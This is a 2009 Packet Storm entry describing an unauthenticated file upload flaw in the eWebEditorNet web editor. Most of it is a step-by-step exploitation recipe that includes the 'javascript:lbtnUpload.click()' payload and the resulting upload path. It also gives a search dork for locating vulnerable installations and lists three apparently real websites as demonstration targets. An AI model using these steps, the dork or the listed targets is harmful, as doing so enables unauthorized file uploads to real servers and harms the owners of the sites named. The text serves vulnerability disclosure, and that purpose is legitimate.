eWebEditor Remote File Upload

2009-08-11T00:00:00
ID PACKETSTORM:80255
Type packetstorm
Reporter Pouya Daneshmand
Modified 2009-08-11T00:00:00

Description

                                        
                                            `######################### Securitylab.ir ########################  
# Application Info:  
# Name: ewebeditornet  
# http://www.ewebeditor.com  
#################################################################  
# Bug found by: Pouya Daneshmand  
# Contact: Pouya[AT]Securitylab[Dot]ir , whh_iran@yahoo.com  
# Website: http://securitylab.ir  
#################################################################  
# Vulnerability Info:  
# Type: Remote File Upload without Authentication  
# Risk: Medium  
# Dork: inurl:/ewebeditornet/  
#===========================================================  
# 1.find page  
# http://site.com/[Path]/ewebEditorNet/upload.aspx  
#  
# 2.Choose File (file allowed:txt,html,jpg,png,doc,swf,gif,bmp,xls,xml,zip)  
#  
# 3.Put this Code instead URL: javascript:lbtnUpload.click()  
#  
# 4.Press Enter  
#  
# 5.viewing source page :  
# <a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')">  
# </a><script language='javascript'>parent.UploadSaved('[Filenumber.txt]');history.back();</script>  
#  
# 6.file uploaded to  
# http://site.com/[Path]/ewebEditorNet/UploadFile/[Filenumber.txt]  
#===========================================================  
#################################################################  
# demo:  
# http://www.zgcxjs.com/admin/eWebEditorNet/upload.aspx  
# http://www.zgxwdc.com/admin/eWebEditorNet/Upload.aspx  
# http://www.yljfzx.com/admin/eWebEditorNet/upload.aspx  
#################################################################  
# Securitylab Security Research Team  
###################################################################  
  
  
`